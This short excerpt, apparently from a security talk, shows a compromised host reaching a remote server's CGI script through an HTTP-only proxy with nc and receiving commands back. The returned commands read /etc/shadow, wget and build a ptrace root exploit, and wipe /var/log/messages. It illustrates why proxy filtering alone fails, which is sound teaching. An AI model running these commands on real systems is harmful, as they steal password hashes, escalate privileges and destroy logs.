All locked down.

Now that only true HTTP is allowed, we're safe, right?

$ nc proxy 3128
POST http://home.my_server.net/cgi-bin/runcommands.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; ...)
Host: home.my_server.net
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 83

uname=Linux+testy+2.4.10-bf2.4+\%231+Son+Apr+14+09\%3a53\%3acpu=
686&cpuspeed=731&memfree=103727

shadow     now   cat /etc/shadow
ptracebug  now   cd /tmp; wget ...ptracebug.c; make ptracebug; 
                  ./ptracebug && echo r00ted
clearlogs  10m   /tmp/.../newsudo cat /dev/null > /var/log/messages